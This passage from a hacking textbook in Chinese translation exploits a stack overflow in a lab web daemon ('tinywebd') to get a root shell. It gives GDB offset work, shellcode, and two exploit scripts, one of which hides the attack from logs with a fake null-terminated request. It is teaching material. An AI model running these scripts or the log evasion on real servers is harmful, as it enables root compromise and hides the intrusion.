当程序运行时，它只是退出。为了调试这个程序，需要告诉 GDB 跟踪子进程，而不是跟踪父进程。这是通过将 follow-fork-mode 设置为 child 来实现的。在此更改之后，调试器将跟踪执行到子进程，在那里可以命中断点。

(gdb) set follow-fork-mode child
(gdb) help set follow-fork-mode
Set debugger response to a program call of fork or vfork.
A fork or vfork creates a new process.  follow-fork-mode can be:
  parent  - the original process is debugged after a fork
  child   - the new process is debugged after a fork
The unfollowed process will continue to run.
By default, the debugger will follow the parent process.
(gdb) run
Starting program: /home/reader/booksrc/a.out
Starting tiny web daemon.
[Switching to process 1051]

Breakpoint 1, main () at tinywebd.c:50
50         signal(SIGTERM, handle_shutdown);   // Call handle_shutdown when killed.
(gdb) quit
The program is running.  Exit anyway? (y or n) y
reader@hacking:~/booksrc $ ps aux | grep a.out
root       911  0.0  0.0   1636   416 ?        Ss   06:04  0:00 /home/reader/booksrc/a.out
reader    1207 0.0 0.0     2880   748 pts/2    R+   06:13  0:00 grep a.out
reader@hacking:~/booksrc $ sudo kill 911
reader@hacking:~/booksrc $

了解如何调试子进程是很好的，但由于我们需要特定的堆栈值，连接到正在运行的过程会更干净、更容易。在杀死任何散乱的 a.out 进程后，重新启动 tinyweb 守护进程，然后使用 GDB 连接到它。

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon..
reader@hacking:~/booksrc $ ps aux | grep tinywebd
root     25830  0.0  0.0   1636   356 ?        Ss   20:10   0:00 ./tinywebd
reader   25837  0.0  0.0   2880   748 pts/1    R+   20:10   0:00 grep tinywebd
reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ sudo gdb -q—pid=25830 --symbols=./a.out

warning: not using untrusted file "/home/reader/.gdbinit"
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Attaching to process 25830
/cow/home/reader/booksrc/tinywebd: No such file or directory.
A program is being debugged already.  Kill it? (y or n) n
Program not killed.
(gdb) bt
#0  0xb7fe77f2 in ?? ()
#1  0xb7f691e1 in ?? ()
#2  0x08048f87 in main () at tinywebd.c:68
(gdb) list 68
63         if (listen(sockfd, 20) == -1)
64            fatal("listening on socket");
65
66         while(1) {   // Accept loop
67            sin_size = sizeof(struct sockaddr_in);
68            new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
69            if(new_sockfd == -1)
70               fatal("accepting connection");
71
72            handle_connection(new_sockfd, &client_addr, logfd);
(gdb) list handle_connection
77      /* This function handles the connection on the passed socket from the
78       * passed client address and logs to the passed FD. The connection is
79       * processed as a web request, and this function replies over the connected
80       * socket. Finally, the passed socket is closed at the end of the function.
81       */
82      void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr, int logfd)
 {
83         unsigned char *ptr, request[500], resource[500], log_buffer[500];
84         int fd, length;
85
86         length = recv_line(sockfd, request);
(gdb) break 86
Breakpoint 1 at 0x8048fc3: file tinywebd.c, line 86.
(gdb) cont
Continuing.

当 tinyweb 守护进程等待连接时，执行会暂停。再次使用浏览器连接到 web 服务器，以推进代码执行到断点。

Breakpoint 1, handle_connection (sockfd=5, client_addr_ptr=0xbffff810) at tinywebd.c:86
86         length = recv_line(sockfd, request);
(gdb) bt
#0  handle_connection (sockfd=5, client_addr_ptr=0xbffff810, logfd=3) at tinywebd.c:86
#1  0x08048fb7 in main () at tinywebd.c:72
(gdb) x/x request
0xbffff5c0:     0x080484ec
(gdb) x/16x request + 500
0xbffff7b4:     0xb7fd5ff4      0xb8000ce0      0x00000000      0xbffff848
0xbffff7c4:     0xb7ff9300      0xb7fd5ff4      0xbffff7e0      0xb7f691c0
0xbffff7d4:     0xb7fd5ff4      0xbffff848      0x08048fb7      0x00000005
0xbffff7e4:     0xbffff810      0x00000003      0xbffff838      0x00000004
(gdb) x/x 0xbffff7d4 + 8
0xbffff7dc:     0x08048fb7
(gdb) p /x 0xbffff7dc - 0xbffff5c0
$1 = 0x21c
(gdb) p 0xbffff7dc - 0xbffff5c0
$2 = 540
(gdb) p /x 0xbffff5c0 + 100
$3 = 0xbffff624
(gdb) quit
The program is running. Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 25830
reader@hacking:~/booksrc $

调试器显示请求缓冲区从 0xbffff5c0 开始，存储的返回地址在 0xbffff7dc，这意味着偏移量是 540 字节。在 500 字节请求缓冲区的中间附近是放置 shellcode 的最安全位置。在下面的输出中，创建了一个漏洞利用缓冲区，将 shellcode 放在 NOP 滑梯和重复 32 次的返回地址之间。重复的 128 字节返回地址使 shellcode 避免了可能被覆盖的不安全堆栈内存。在漏洞利用缓冲区的开头也有不安全的字节，这些字节将在空终止符期间被覆盖。为了使 shellcode 避免这个范围，在其前面放置了一个 100 字节的 NOP 滑梯。这为执行指针留下了一个安全着陆区，shellcode 位于 0xbffff624。下面的输出使用回环 shellcode 利用漏洞。

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ wc -c loopback_shell
83 loopback_shell

reader@hacking:~/booksrc $ echo $((540+4 - (32*4) - 83))
333
reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 9835
reader@hacking:~/booksrc $ jobs
[1]+ Running                  nc -l -p 31337 &
reader@hacking:~/booksrc $ (perl -e 'print "\x90"x333'; cat loopback_shell; perl -e
 'print "\
x24\xf6\xff\xbf"x32 . "\r\n"') | nc -w 1 -v 127.0.0.1 80
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

由于返回地址的偏移量是 540 字节，因此需要 544 字节来覆盖地址。带有 83 字节循环回 shellcode 和重复 32 次的覆盖返回地址，简单的算术表明 NOP 雪橇需要 333 字节来正确地对齐攻击缓冲区中的所有内容。netcat 以监听模式运行，并在末尾附加一个&符号，将进程发送到后台。这监听来自 shellcode 的连接回传，可以用fg（前台）命令稍后恢复。在 LiveCD 上，命令提示符中的@符号如果有后台作业，会改变颜色，也可以用jobs命令列出。当攻击缓冲区被管道传输到 netcat 时，使用-w选项告诉它在 1 秒后超时。之后，接收了连接回传 shell 的已后台化的 netcat 进程可以被恢复。

所有这些都很好，但如果使用了不同大小的 shellcode，必须重新计算 NOP 雪橇的大小。所有这些重复的步骤都可以放入一个单独的 shell 脚本中。

BASH shell 允许简单的控制结构。这个脚本开头的if语句只是为了错误检查和显示使用信息。shell 变量用于偏移量和覆盖返回地址，因此可以很容易地更改以针对不同的目标。用于攻击的 shellcode 作为命令行参数传递，这使得它成为一个尝试各种 shellcode 的有用工具。

xtool_tinywebd.sh

#!/bin/sh
# A tool for exploiting tinywebd

if [ -z "$2" ]; then # If argument 2 is blank
   echo "Usage: $0 <shellcode file> <target IP>"
   exit
fi
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE))

echo "[NOP ($ALIGNED_SLED_SIZE bytes)] [shellcode ($SIZE bytes)] [ret addr
($((4*32)) bytes)]"
( perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE";
 cat $1;
 perl -e "print \"$RETADDR\"x32 . \"\r\n\"";) | nc -w 1 -v $2 80

注意，这个脚本额外重复了返回地址三十三次，但它是用 128 字节（32 x 4）来计算雪橇大小的。这使得返回地址的副本超出了偏移量指定的位置。有时不同的编译器选项会稍微移动返回地址，这使得攻击更加可靠。下面的输出显示了该工具再次被用来攻击 tinyweb 守护进程，但这次使用了端口绑定 shellcode。

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ ./xtool_tinywebd.sh portbinding_shellcode 127.0.0.1
target IP: 127.0.0.1
shellcode: portbinding_shellcode (92 bytes)
[NOP (324 bytes)] [shellcode (92 bytes)] [ret addr (128 bytes)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ nc -vv 127.0.0.1 31337
localhost [127.0.0.1] 31337 (?) open
whoami
root

现在攻击方已经装备了攻击脚本，考虑一下使用它时会发生什么。如果你是运行 tinyweb 守护进程的服务器管理员，你首先会看到什么迹象表明你被黑了？

日志文件

两个最明显的入侵迹象之一是日志文件。tinyweb 守护进程保留的日志文件是当解决问题时首先要查看的地方之一。尽管攻击者的攻击是成功的，但日志文件仍然保留了一个痛苦明显的记录，表明出了问题。

日志文件

tinywebd 日志文件

reader@hacking:~/booksrc $ sudo cat /var/log/tinywebd.log
07/25/2007 14:55:45> Starting up.
07/25/2007 14:57:00> From 127.0.0.1:38127 "HEAD / HTTP/1.0"      200 OK
07/25/2007 17:49:14> From 127.0.0.1:50201 "GET / HTTP/1.1"       200 OK
07/25/2007 17:49:14> From 127.0.0.1:50202 "GET /image.jpg HTTP/1.1"      200 OK
07/25/2007 17:49:14> From 127.0.0.1:50203 "GET /favicon.ico HTTP/1.1"    404 Not Found
07/25/2007 17:57:21> Shutting down.
08/01/2007 15:43:08> Starting up.
08/01/2007 15:43:41> From 127.0.0.1:45396 "␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣jfX␣1␣CRj j ␣␣ ␣jfXCh ␣␣
 f␣T$ fhzifS␣␣j OV␣␣C ␣␣␣␣I␣? Iy␣␣
                                  Rh//shh/bin␣␣R␣␣S␣␣ $␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣
␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣
␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣$␣␣␣" NOT HTTP!
reader@hacking:~/booksrc $

当然，在这种情况下，攻击者获得 root shell 后，他可以直接编辑日志文件，因为它们在同一个系统上。然而，在安全的网络上，日志的副本通常会发送到另一个安全服务器。在极端情况下，日志会被发送到打印机以生成硬拷贝，因此有一个物理记录。这些类型的对策可以防止在成功利用后篡改日志。

与众不同

尽管日志文件本身不能更改，但偶尔记录的内容可以更改。日志文件通常包含许多有效条目，而漏洞尝试则像 sore thumb 一样突出。可以欺骗 tinyweb 守护程序程序记录一个看似有效的漏洞尝试条目。查看源代码，看看在继续之前你是否能找出如何做到这一点。想法是使日志条目看起来像有效的网络请求，如下所示：

07/22/2007 17:57:00> From 127.0.0.1:38127 "HEAD / HTTP/1.0"   200 OK
07/25/2007 14:49:14> From 127.0.0.1:50201 "GET / HTTP/1.1"    200 OK
07/25/2007 14:49:14> From 127.0.0.1:50202 "GET /image.jpg HTTP/1.1"   200 OK
07/25/2007 14:49:14> From 127.0.0.1:50203 "GET /favicon.ico HTTP/1.1"    404 Not Found

这种伪装在拥有大量日志文件的大型企业中非常有效，因为有许多有效请求需要隐藏：在拥挤的商场中融入比在空旷的街道上更容易。但如何将一个庞大、丑陋的漏洞缓冲区隐藏在寓言中的羊皮中呢？

在 tinyweb 守护程序的源代码中有一个简单的错误，允许在用于日志文件输出时提前截断请求缓冲区，但在复制到内存中时不会。recv_line()函数使用\r\n作为分隔符；然而，所有其他标准字符串函数都使用空字节作为分隔符。这些字符串函数用于写入日志文件，因此通过战略性地使用这两个分隔符，可以部分控制写入日志的数据。

以下漏洞利用脚本将一个看似有效的请求放在漏洞利用缓冲区的其余部分之前。将 NOP sled 缩小以适应新数据。

xtool_tinywebd_stealth.sh

#!/bin/sh
# stealth exploitation tool
if [ -z "$2" ]; then # If argument 2 is blank
   echo "Usage: $0 <shellcode file> <target IP>"
   exit
fi
FAKEREQUEST="GET / HTTP/1.1\x00"
FR_SIZE=$(perl -e "print \"$FAKEREQUEST\"" | wc -c | cut -f1 -d ' ')
OFFSET=540
RETADDR="\x24\xf6\xff\xbf" # At +100 bytes from buffer @ 0xbffff5c0
echo "target IP: $2"
SIZE=`wc -c $1 | cut -f1 -d ' '`
echo "shellcode: $1 ($SIZE bytes)"
echo "fake request: \"$FAKEREQUEST\" ($FR_SIZE bytes)"
ALIGNED_SLED_SIZE=$(($OFFSET+4 - (32*4) - $SIZE - $FR_SIZE))

echo "[Fake Request ($FR_SIZE b)] [NOP ($ALIGNED_SLED_SIZE b)] [shellcode
($SIZE b)] [ret addr ($((4*32)) b)]"
(perl -e "print \"$FAKEREQUEST\" . \"\x90\"x$ALIGNED_SLED_SIZE";
 cat $1;
 perl -e "print \"$RETADDR\"x32 . \"\r\n\"") | nc -w 1 -v $2 80

这个新的漏洞利用缓冲区使用空字节分隔符来终止伪装的伪造请求。空字节不会停止recv_line()函数，因此漏洞利用缓冲区的其余部分被复制到堆栈上。由于用于写入日志的字符串函数使用空字节作为终止符，因此伪造请求被记录，其余的漏洞利用被隐藏。以下输出显示了此漏洞利用脚本的使用情况。

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ nc -l -p 31337 &
[1] 7714
reader@hacking:~/booksrc $ jobs
[1]+ Running                  nc -l -p 31337 &
reader@hacking:~/booksrc $ ./xtool_tinywebd_steath.sh loopback_shell 127.0.0.1
target IP: 127.0.0.1
shellcode: loopback_shell (83 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (318 b)] [shellcode (83 b)] [ret addr (128 b)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ fg
nc -l -p 31337
whoami
root

此漏洞利用所使用的连接会在服务器机器上创建以下日志文件条目。

08/02/2007 13:37:36> Starting up..
08/02/2007 13:37:44> From 127.0.0.1:32828 "GET / HTTP/1.1"      200 OK

尽管无法使用此方法更改记录的 IP 地址，但请求本身看起来是有效的，因此不会引起太多注意。

忽视明显之处

在现实场景中，入侵的其他明显迹象甚至比日志文件更明显。然而，在测试时，这是很容易被忽视的东西。如果你认为日志文件是入侵的最明显迹象，那么你忘记了服务中断。当 tinyweb 守护程序被利用时，进程被欺骗以提供远程 root shell，但它不再处理网络请求。在现实场景中，当有人尝试访问网站时，这种漏洞几乎会立即被发现。

一位熟练的黑客不仅可以破解程序以利用它，还可以将其重新组装并保持运行。程序继续处理请求，似乎什么都没发生。

一步一个脚印

复杂的攻击行为很难，因为可能发生很多不同的问题，而且没有根因的指示。由于追踪错误发生的位置可能需要数小时，通常最好将复杂的攻击行为分解成更小的部分。最终目标是生成一段 shellcode，它将启动 shell 同时保持 tinyweb 服务器运行。shell 是交互式的，这引起了一些复杂性，所以我们稍后再处理。现在，第一步应该是确定如何在利用它之后将 tinyweb 守护进程重新组装起来。让我们先编写一段 shellcode，使其执行一些操作以证明它已运行，然后将 tinyweb 守护进程重新组装起来以便处理进一步的 Web 请求。

由于 tinyweb 守护进程将标准输出重定向到/dev/null，因此向标准输出写入不是一个可靠的 shellcode 运行证明方法。证明 shellcode 已运行的一个简单方法就是创建一个文件。这可以通过调用open()然后close()来实现。当然，open()调用需要适当的标志来创建文件。我们可以查看包含文件以了解O_CREAT和其他所有必要的定义实际上是什么，并对参数进行所有位运算，但这有点麻烦。如果你还记得，我们之前已经做过类似的事情——记事本程序会调用open()，如果文件不存在，则会创建文件。strace 程序可以用于任何程序，以显示它所做的每个系统调用。在下面的输出中，这是用来验证 C 中的open()参数与原始系统调用相匹配的。

reader@hacking:~/booksrc $ strace ./notetaker test
execve("./notetaker", ["./notetaker", "test"], [/* 27 vars */]) = 0
brk(0)                                  = 0x804a000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe5000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=70799, ..}) = 0
mmap2(NULL, 70799, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fd3000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\0`\1\000".., 512) = 512
fstat64(3, {st_mode=S_IFREG|0644, st_size=1307104, ..}) = 0
mmap2(NULL, 1312164, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e92000
mmap2(0xb7fcd000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3,
 0x13b) =
0xb7fcd000
mmap2(0xb7fd0000, 9636, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0)
 =
0xb7fd0000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e91000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e916c0, limit:1048575, seg_32bit:1,
contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb7fcd000, 4096, PROT_READ)   = 0
munmap(0xb7fd3000, 70799)               = 0
brk(0)                                  = 0x804a000
brk(0x806b000)                          = 0x806b000
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ..}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe4000
write(1, "[DEBUG] buffer   @ 0x804a008: \'t".., 37[DEBUG] buffer @ 0x804a008: 'test'
) = 37
write(1, "[DEBUG] datafile @ 0x804a070: \'/".., 43[DEBUG] datafile @ 0x804a070:
 '/var/notes'
) = 43
`open("/var/notes", O_WRONLY|O_APPEND|O_CREAT, 0600) = -1 EACCES (Permission denied)`
dup(2)                                  = 3
fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR)
fstat64(3, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 2), ..}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fe3000
_llseek(3, 0, 0xbffff4e4, SEEK_CUR)     = -1 ESPIPE (Illegal seek)
write(3, "[!!] Fatal Error in main() while".., 65[!!] Fatal Error in main() while opening 
file:
Permission denied
) = 65
close(3)                                = 0
munmap(0xb7fe3000, 4096)                = 0
exit_group(-1)                          = ?
Process 21473 detached
reader@hacking:~/booksrc $ grep open notetaker.c
         fd = open(datafile, O_WRONLY|O_CREAT|O_APPEND, S_IRUSR|S_IWUSR);
                fatal("in main() while opening file");
reader@hacking:~/booksrc $

当通过 strace 运行时，记事本二进制文件的 suid 位没有被使用，因此它没有权限打开数据文件。但这没关系；我们只是想确保open()系统调用的参数与 C 中的open()调用参数相匹配。由于它们匹配，我们可以安全地使用记事本二进制文件中传递给open()函数的值作为我们 shellcode 中open()系统调用的参数。编译器已经完成了查找定义并将它们与位或操作组合在一起的所有工作；我们只需要在记事本二进制文件的汇编中找到调用参数。

reader@hacking:~/booksrc $ gdb -q ./notetaker
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) set dis intel
(gdb) disass main
Dump of assembler code for function main:
0x0804875f <main+0>:    push   ebp
0x08048760 <main+1>:    mov    ebp,esp
0x08048762 <main+3>:    sub    esp,0x28
0x08048765 <main+6>:    and    esp,0xfffffff0
0x08048768 <main+9>:    mov    eax,0x0
0x0804876d <main+14>:   sub    esp,eax
0x0804876f <main+16>:   mov    DWORD PTR [esp],0x64
0x08048776 <main+23>:   call   0x8048601 <ec_malloc>
0x0804877b <main+28>:   mov    DWORD PTR [ebp-12],eax
0x0804877e <main+31>:   mov    DWORD PTR [esp],0x14
0x08048785 <main+38>:   call   0x8048601 <ec_malloc>
0x0804878a <main+43>:   mov    DWORD PTR [ebp-16],eax
0x0804878d <main+46>:   mov    DWORD PTR [esp+4],0x8048a9f
0x08048795 <main+54>:   mov    eax,DWORD PTR [ebp-16]
0x08048798 <main+57>:   mov    DWORD PTR [esp],eax
0x0804879b <main+60>:   call   0x8048480 <strcpy@plt>
0x080487a0 <main+65>:   cmp    DWORD PTR [ebp+8],0x1
0x080487a4 <main+69>:   jg     0x80487ba <main+91>
0x080487a6 <main+71>:   mov    eax,DWORD PTR [ebp-16]
0x080487a9 <main+74>:   mov    DWORD PTR [esp+4],eax
0x080487ad <main+78>:   mov    eax,DWORD PTR [ebp+12]
0x080487b0 <main+81>:   mov    eax,DWORD PTR [eax]
0x080487b2 <main+83>:   mov    DWORD PTR [esp],eax
0x080487b5 <main+86>:   call   0x8048733 <usage>
0x080487ba <main+91>:   mov    eax,DWORD PTR [ebp+12]
0x080487bd <main+94>:   add    eax,0x4
0x080487c0 <main+97>:   mov    eax,DWORD PTR [eax]
0x080487c2 <main+99>:   mov    DWORD PTR [esp+4],eax
0x080487c6 <main+103>:  mov    eax,DWORD PTR [ebp-12]
0x080487c9 <main+106>:  mov    DWORD PTR [esp],eax
0x080487cc <main+109>:  call   0x8048480 <strcpy@plt>
0x080487d1 <main+114>:  mov    eax,DWORD PTR [ebp-12]
0x080487d4 <main+117>:  mov    DWORD PTR [esp+8],eax
0x080487d8 <main+121>:  mov    eax,DWORD PTR [ebp-12]
0x080487db <main+124>:  mov    DWORD PTR [esp+4],eax
0x080487df <main+128>:  mov    DWORD PTR [esp],0x8048aaa
0x080487e6 <main+135>:  call   0x8048490 <printf@plt>
0x080487eb <main+140>:  mov    eax,DWORD PTR [ebp-16]
0x080487ee <main+143>:  mov    DWORD PTR [esp+8],eax
0x080487f2 <main+147>:  mov    eax,DWORD PTR [ebp-16]
0x080487f5 <main+150>:  mov    DWORD PTR [esp+4],eax
0x080487f9 <main+154>:  mov    DWORD PTR [esp],0x8048ac7
0x08048800 <main+161>:  call   0x8048490 <printf@plt>
`0x08048805 <main+166>:  mov    DWORD PTR [esp+8],0x180 0x0804880d <main+174>:  mov    DWORD PTR [esp+4],0x441 0x08048815 <main+182>:  mov    eax,DWORD PTR [ebp-16] 0x08048818 <main+185>:  mov    DWORD PTR [esp],eax 0x0804881b <main+188>: call 0x8048410 <open@plt>`
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb)

记住，函数调用的参数将被推送到栈中，顺序是相反的。在这种情况下，编译器决定使用mov DWORD PTR[esp+offset], value_to_push_to_stack而不是push指令，但栈上构建的结构是等效的。第一个参数是文件名的指针，位于 EAX 中，第二个参数（放置在[esp+4]）是0x441，第三个参数（放置在[esp+8]）是0x180。这意味着O_WRONLY|O_CREAT|O_APPEND的结果是0x441，而S_IRUSR|S_IWUSR是0x180。以下 shellcode 使用这些值在根文件系统中创建一个名为 Hacked 的文件。

mark.s

BITS 32 
; Mark the filesystem to prove you ran.
   jmp short one
   two:
   pop ebx              ; Filename
   xor ecx, ecx
   mov BYTE [ebx+7], cl ; Null terminate filename
   push BYTE 0x5        ; Open()
   pop eax
   mov WORD cx, 0x441   ; O_WRONLY|O_APPEND|O_CREAT
   xor edx, edx
   mov WORD dx, 0x180   ; S_IRUSR|S_IWUSR
   int 0x80             ; Open file to create it.
      ; eax = returned file descriptor
   mov ebx, eax         ; File descriptor to second arg
   push BYTE 0x6        ; Close ()
   pop eax
   int 0x80 ; Close file.

   xor eax, eax
   mov ebx, eax
   inc eax    ; Exit call.
   int 0x80   ; Exit(0), to avoid an infinite loop.
one:
   call two
db "/HackedX"
;   01234567

Shellcode 打开一个文件以创建它，然后立即关闭文件。最后，它调用 exit 以避免无限循环。下面的输出显示了使用漏洞工具使用的新 Shellcode。

reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ nasm mark.s
reader@hacking:~/booksrc $ hexdump -C mark
00000000  eb 23 5b 31 c9 88 4b 07  6a 05 58 66 b9 41 04 31  |.#[1.K.j.Xf.A.1|
00000010  d2 66 ba 80 01 cd 80 89  c3 6a 06 58 cd 80 31 c0  |.f....j.X.1.|
00000020  89 c3 40 cd 80 e8 d8 ff  ff ff 2f 48 61 63 6b 65  |.@..../Hacke|
00000030  64 58                                             |dX|
00000032
reader@hacking:~/booksrc $ ls -l /Hacked
ls: /Hacked: No such file or directory
reader@hacking:~/booksrc $ ./xtool_tinywebd_steath.sh mark 127.0.0.1
target IP: 127.0.0.1
shellcode: mark (44 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (357 b)] [shellcode (44 b)] [ret addr (128 b)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ ls -l /Hacked
-rw------- 1 root reader 0 2007-09-17 16:59 /Hacked
reader@hacking:~/booksrc $

将事物重新组合在一起

要将事物重新组合在一起，我们只需要修复由覆盖和/或 Shellcode 造成的任何附带损害，然后跳转到 main() 中的连接接受循环。下面的输出中 main() 的反汇编显示我们可以安全地返回到地址 0x08048f64、0x08048f65 或 0x08048fb7 以返回到连接接受循环。

reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x08048d93 <main+0>:    push   ebp
0x08048d94 <main+1>:    mov    ebp,esp
0x08048d96 <main+3>:    sub    esp,0x68
0x08048d99 <main+6>:    and    esp,0xfffffff0
0x08048d9c <main+9>:    mov    eax,0x0
0x08048da1 <main+14>:   sub    esp,eax

.:[ output trimmed ]:.

0x08048f4b <main+440>:  mov    DWORD PTR [esp],eax
0x08048f4e <main+443>:  call   0x8048860 <listen@plt>
0x08048f53 <main+448>:  cmp    eax,0xffffffff
0x08048f56 <main+451>:  jne    0x8048f64 <main+465>
0x08048f58 <main+453>:  mov    DWORD PTR [esp],0x804961a
0x08048f5f <main+460>:  call   0x8048ac4 <fatal>
`0x08048f64 <main+465>:  nop 0x08048f65 <main+466>:  mov    DWORD PTR [ebp-60],0x10`
0x08048f6c <main+473>:  lea    eax,[ebp-60]
0x08048f6f <main+476>:  mov    DWORD PTR [esp+8],eax
0x08048f73 <main+480>:  lea    eax,[ebp-56]
0x08048f76 <main+483>:  mov    DWORD PTR [esp+4],eax
0x08048f7a <main+487>:  mov    eax,ds:0x804a970
0x08048f7f <main+492>:  mov    DWORD PTR [esp],eax
0x08048f82 <main+495>:  call   0x80488d0 <accept@plt>
0x08048f87 <main+500>:  mov    DWORD PTR [ebp-12],eax
0x08048f8a <main+503>:  cmp    DWORD PTR [ebp-12],0xffffffff
0x08048f8e <main+507>:  jne    0x8048f9c <main+521>
0x08048f90 <main+509>:  mov    DWORD PTR [esp],0x804962e
0x08048f97 <main+516>:  call   0x8048ac4 <fatal>
0x08048f9c <main+521>:  mov    eax,ds:0x804a96c
0x08048fa1 <main+526>:  mov    DWORD PTR [esp+8],eax
0x08048fa5 <main+530>:  lea    eax,[ebp-56]
0x08048fa8 <main+533>:  mov    DWORD PTR [esp+4],eax
0x08048fac <main+537>:  mov    eax,DWORD PTR [ebp-12]
0x08048faf <main+540>:  mov    DWORD PTR [esp],eax
0x08048fb2 <main+543>:  call   0x8048fb9 <handle_connection>
`0x08048fb7 <main+548>:  jmp    0x8048f65 <main+466>`
End of assembler dump.
(gdb)

这三个地址基本上都指向同一个地方。让我们使用 0x08048fb7，因为这是用于调用 handle_connection() 的原始返回地址。然而，我们还需要先修复其他一些问题。查看 handle_connection() 的函数前缀和后缀。这些是设置和移除堆栈帧结构的指令。

(gdb) disass handle_connection
Dump of assembler code for function handle_connection:
`0x08048fb9 <handle_connection+0>:       push   ebp 0x08048fba <handle_connection+1>:       mov    ebp,esp 0x08048fbc <handle_connection+3>:       push   ebx 0x08048fbd <handle_connection+4>:       sub    esp,0x644`
0x08048fc3 <handle_connection+10>:      lea    eax,[ebp-0x218]
0x08048fc9 <handle_connection+16>:      mov    DWORD PTR [esp+4],eax
0x08048fcd <handle_connection+20>:      mov    eax,DWORD PTR [ebp+8]
0x08048fd0 <handle_connection+23>:      mov    DWORD PTR [esp],eax
0x08048fd3 <handle_connection+26>:      call   0x8048cb0 <recv_line>
0x08048fd8 <handle_connection+31>:      mov    DWORD PTR [ebp-0x620],eax
0x08048fde <handle_connection+37>:      mov    eax,DWORD PTR [ebp+12]
0x08048fe1 <handle_connection+40>:      movzx  eax,WORD PTR [eax+2]
0x08048fe5 <handle_connection+44>:      mov    DWORD PTR [esp],eax
0x08048fe8 <handle_connection+47>:      call   0x80488f0 <ntohs@plt>

.:[ output trimmed ]:.

0x08049302 <handle_connection+841>:     call   0x8048850 <write@plt>
0x08049307 <handle_connection+846>:     mov    DWORD PTR [esp+4],0x2
0x0804930f <handle_connection+854>:     mov    eax,DWORD PTR [ebp+8]
